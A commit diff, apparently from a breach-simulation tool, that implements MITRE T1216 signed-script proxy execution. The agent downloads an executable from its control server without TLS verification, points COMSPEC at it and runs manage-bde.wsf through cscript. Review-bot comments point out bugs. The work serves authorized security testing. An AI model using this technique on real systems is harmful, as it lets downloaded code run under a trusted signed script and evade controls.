Code review changes
- smaller executable file; fetches it from the island when pba needs to run - technique configured off by default - other implementation changes
This commit is contained in:
parent
59f9752faf
commit
4b664031af
|
@ -325,6 +325,16 @@ class ControlClient(object):
|
||||||
except requests.exceptions.RequestException:
|
except requests.exceptions.RequestException:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_T1216_pba_file():
|
||||||
|
try:
|
||||||
|
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
|
||||||
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
stream=True)
|
||||||
|
except requests.exceptions.RequestException:
|
||||||
|
return False
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def should_monkey_run(vulnerable_port: str) -> bool:
|
def should_monkey_run(vulnerable_port: str) -> bool:
|
||||||
if vulnerable_port and \
|
if vulnerable_port and \
|
||||||
|
|
|
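Review bot: get_T1216_pba_file returns `False` on RequestException, but the only consumer this commit adds (signed_script_proxy_windows.py) uses it as `with ControlClient.get_T1216_pba_file() as r:`, so the failure path raises AttributeError on the bool instead of being handled; either return None and test it at the call site, or let the exception propagate. The response status is never checked either, so a 404/500 body would be streamed to disk as the executable — restructure to `resp = requests.get(...)`, `resp.raise_for_status()`, `return resp` inside the try (HTTPError is a RequestException, so the existing except still covers it). A one-line docstring, e.g. `"""Stream the T1216 PBA executable from the island; returns the open Response, or False on a request error."""`, would make the contract explicit. The enclosing class continues outside the hunk.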
@ -1,7 +1,10 @@
|
||||||
|
import subprocess
|
||||||
|
|
||||||
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
||||||
from infection_monkey.post_breach.pba import PBA
|
from infection_monkey.post_breach.pba import PBA
|
||||||
from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
|
from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
|
||||||
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
||||||
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
|
||||||
|
|
||||||
class SignedScriptProxyExecution(PBA):
|
class SignedScriptProxyExecution(PBA):
|
||||||
|
@ -10,4 +13,12 @@ class SignedScriptProxyExecution(PBA):
|
||||||
super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
|
super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
|
||||||
windows_cmd=' '.join(windows_cmds))
|
windows_cmd=' '.join(windows_cmds))
|
||||||
|
|
||||||
cleanup_changes()
|
def run(self):
|
||||||
|
original_comspec = ''
|
||||||
|
if is_windows_os():
|
||||||
|
original_comspec =\
|
||||||
|
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
||||||
|
|
||||||
|
super().run()
|
||||||
|
|
||||||
|
cleanup_changes(original_comspec)
|
||||||
|
|
|
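Review bot: `original_comspec` in the new run() keeps the trailing `\r\n` from `check_output(...).decode()`, and that string later lands in `f'set comspec={original_comspec}'` in get_windows_commands_to_reset_comspec (same commit), so the reset command carries a newline; use `.decode().strip('\r\n')` as the `%WINDIR%` lookup in signed_script_proxy_windows.py already does. `super().run()` is also not guarded, so an exception in the PBA leaves COMSPEC pointing at the temporary executable — wrap it as `try: super().run()` / `finally: cleanup_changes(original_comspec)`. A short docstring on run(), saying it snapshots COMSPEC before the PBA runs and restores it afterwards, would help the next reader. The `__init__` the first lines of this hunk belong to starts outside the hunk.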
@ -11,6 +11,6 @@ def get_commands_to_proxy_execution_using_signed_script():
|
||||||
return windows_cmds
|
return windows_cmds
|
||||||
|
|
||||||
|
|
||||||
def cleanup_changes():
|
def cleanup_changes(original_comspec):
|
||||||
if is_windows_os():
|
if is_windows_os():
|
||||||
subprocess.run(get_windows_commands_to_reset_comspec(), shell=True) # noqa: DUO116
|
subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116
|
||||||
|
|
Binary file not shown.
|
@ -1,16 +1,25 @@
|
||||||
import subprocess
|
import subprocess
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
ORIGINAL_COMSPEC = r'C:\Windows\System32\cmd.exe'
|
from infection_monkey.control import ControlClient
|
||||||
|
|
||||||
|
|
||||||
def get_windows_commands_to_proxy_execution_using_signed_script():
|
def get_windows_commands_to_proxy_execution_using_signed_script():
|
||||||
global ORIGINAL_COMSPEC
|
# temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
|
||||||
ORIGINAL_COMSPEC = subprocess.check_output('echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
# temp_comspec = Path(*temp_comspec_path)
|
||||||
|
with ControlClient.get_T1216_pba_file() as r:
|
||||||
|
with open(temp_comspec, 'wb') as f:
|
||||||
|
shutil.copyfileobj(r.raw, f)
|
||||||
|
|
||||||
|
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
|
||||||
|
signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
|
||||||
|
signed_script = Path(*signed_script_path)
|
||||||
|
|
||||||
return [
|
return [
|
||||||
r'set comspec=infection_monkey\post_breach\signed_script_proxy\windows\random_executable.exe &&',
|
f'set comspec={temp_comspec} &&',
|
||||||
r'cscript C:\Windows\System32\manage-bde.wsf'
|
f'cscript {signed_script}'
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
def get_windows_commands_to_reset_comspec():
|
def get_windows_commands_to_reset_comspec(original_comspec):
|
||||||
return f'set comspec={ORIGINAL_COMSPEC}'
|
return f'set comspec={original_comspec}'
|
||||||
|
|
|
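Review bot: The new body of get_windows_commands_to_proxy_execution_using_signed_script references `temp_comspec` and `shutil`, but the `temp_comspec` assignment is left commented out (`# temp_comspec = Path(*temp_comspec_path)`) and the import block at the top of the hunk has no `import shutil`, so the function raises NameError before any command is returned; restore the two commented lines and add `import shutil` beside `import subprocess`. The downloaded bytes are written to disk and then used as COMSPEC without any integrity check, over a request ControlClient makes with `verify=False`, so the file is trusted purely on the URL — comparing a hash of the received bytes against a value the island provides, or at minimum calling `r.raise_for_status()` before copying, would close that gap. Importing `ControlClient` from `infection_monkey.control` into a PBA helper module may also introduce an import cycle if `control` transitively imports the post-breach package; worth confirming.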
@ -35,6 +35,8 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
|
||||||
from monkey_island.cc.resources.remote_run import RemoteRun
|
from monkey_island.cc.resources.remote_run import RemoteRun
|
||||||
from monkey_island.cc.resources.reporting.report import Report
|
from monkey_island.cc.resources.reporting.report import Report
|
||||||
from monkey_island.cc.resources.root import Root
|
from monkey_island.cc.resources.root import Root
|
||||||
|
from monkey_island.cc.resources.T1216_pba_file_download import \
|
||||||
|
T1216PBAFileDownload
|
||||||
from monkey_island.cc.resources.telemetry import Telemetry
|
from monkey_island.cc.resources.telemetry import Telemetry
|
||||||
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
||||||
from monkey_island.cc.resources.test.clear_caches import ClearCaches
|
from monkey_island.cc.resources.test.clear_caches import ClearCaches
|
||||||
|
@ -130,6 +132,7 @@ def init_api_resources(api):
|
||||||
api.add_resource(Log, '/api/log', '/api/log/')
|
api.add_resource(Log, '/api/log', '/api/log/')
|
||||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||||
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
||||||
|
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
|
||||||
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
||||||
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
||||||
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
||||||
|
|
|
@ -0,0 +1,15 @@
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import flask_restful
|
||||||
|
from flask import send_from_directory
|
||||||
|
|
||||||
|
|
||||||
|
class T1216PBAFileDownload(flask_restful.Resource):
|
||||||
|
"""
|
||||||
|
File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
|
||||||
|
"""
|
||||||
|
|
||||||
|
def get(self):
|
||||||
|
executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
|
||||||
|
executable_file = Path(*executable_file_path)
|
||||||
|
return send_from_directory(executable_file)
|
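Review bot: `send_from_directory(executable_file)` in T1216PBAFileDownload.get passes a single argument, but flask's `send_from_directory` takes a directory and a filename, so this endpoint raises TypeError on every request. The path list is also relative to the process working directory rather than to the module; since the resource module lives under `monkey_island/cc/resources/` (per the import added in the island app), anchor it on `__file__`: `executable_dir = Path(__file__).resolve().parent / 'pba'` and `return send_from_directory(executable_dir, 'T1216_random_executable.exe')`. Keeping the filename fixed with no client-supplied path component is the right shape for a file-serving endpoint; the class docstring could state that explicitly.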
Binary file not shown.
|
@ -189,7 +189,7 @@ SCHEMA = {
|
||||||
"T1216": {
|
"T1216": {
|
||||||
"title": "Signed script proxy execution",
|
"title": "Signed script proxy execution",
|
||||||
"type": "bool",
|
"type": "bool",
|
||||||
"value": True,
|
"value": False,
|
||||||
"necessary": False,
|
"necessary": False,
|
||||||
"link": "https://attack.mitre.org/techniques/T1216",
|
"link": "https://attack.mitre.org/techniques/T1216",
|
||||||
"description": "Adversaries may use scripts signed with trusted certificates to "
|
"description": "Adversaries may use scripts signed with trusted certificates to "
|
||||||
|
|
|
@ -7,9 +7,9 @@ __author__ = "shreyamalviya"
|
||||||
|
|
||||||
class T1216(PostBreachTechnique):
|
class T1216(PostBreachTechnique):
|
||||||
tech_id = "T1216"
|
tech_id = "T1216"
|
||||||
unscanned_msg = "Monkey didn't attempt to execute an arbitrary file with the help of a " +\
|
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
|
||||||
"pre-existing signed script since it didn't run on any Windows machines."
|
"pre-existing signed script since it didn't run on any Windows machines."
|
||||||
scanned_msg = "Monkey attempted to execute an arbitrary file with the help of a " +\
|
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
|
||||||
"pre-existing signed script on Windows but failed."
|
"pre-existing signed script on Windows but failed."
|
||||||
used_msg = "Monkey executed an arbitrary file with the help of a pre-existing signed script on Windows."
|
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
|
||||||
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
||||||
|
|
|
@ -67,8 +67,7 @@ MONKEY = {
|
||||||
"HiddenFiles",
|
"HiddenFiles",
|
||||||
"TrapCommand",
|
"TrapCommand",
|
||||||
"ChangeSetuidSetgid",
|
"ChangeSetuidSetgid",
|
||||||
"ScheduleJobs",
|
"ScheduleJobs"
|
||||||
"SignedScriptProxyExecution"
|
|
||||||
]
|
]
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|